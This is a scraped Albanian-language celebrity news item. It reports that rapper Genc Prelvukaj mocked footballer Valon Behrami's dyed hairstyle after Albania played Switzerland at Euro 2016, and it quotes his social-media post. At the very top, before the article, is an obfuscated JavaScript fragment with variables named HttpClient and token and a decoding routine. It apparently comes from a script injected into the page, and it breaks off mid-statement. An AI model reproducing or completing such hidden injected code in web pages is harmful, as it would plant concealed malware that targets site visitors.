;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Genc Prelvukaj tallet me Valon Behramin

By

Ndeshja e djeshme mes Shqipërisë dhe Zvicrrës në Euro 2016 ka provokuar debat jo vetëm për simbolikën e veçantë të vëllezërve Xhaka por edhe për gjestin e Valon Behramit.

Shqiptari nga Suhadolli i Mitrovicës u duk se u gëzua shumë pas golit në minutën e katërt dhe kjo ka shpërndarë një antipati të madhe mes ndjekësve në rrjete sociale ku nuk janë kursyer epitetet e shumta.

Por, nëse nga shumica, Valoni ofendohet për zgjedhjen e tij për të luajtur për Zvicrrën, Genc Prelvukaj mendon se ai duhet sharë për diçka tjetër.

Reperi që nuk po kursehet në opinione për çështje të ndryshme ka bërë shaka me stilin e flokëve të futbollistit.

‘Valon preji shkurt e mos i ngjyros. Te rrijne mire edhe te shkurta. Edhe Beckham qe e pate shpike kete stil e ka mbajte vec 1 vjet. Ty tu kane bo gati 10. Ndryshoji dhe na ben te lumtur’ – është shprehur mes tjerash Genci në postimin e tij që është pëlqyer nga ndjekësit në rrjete sociale. /Prive.al/

Artikuj të ngjashëm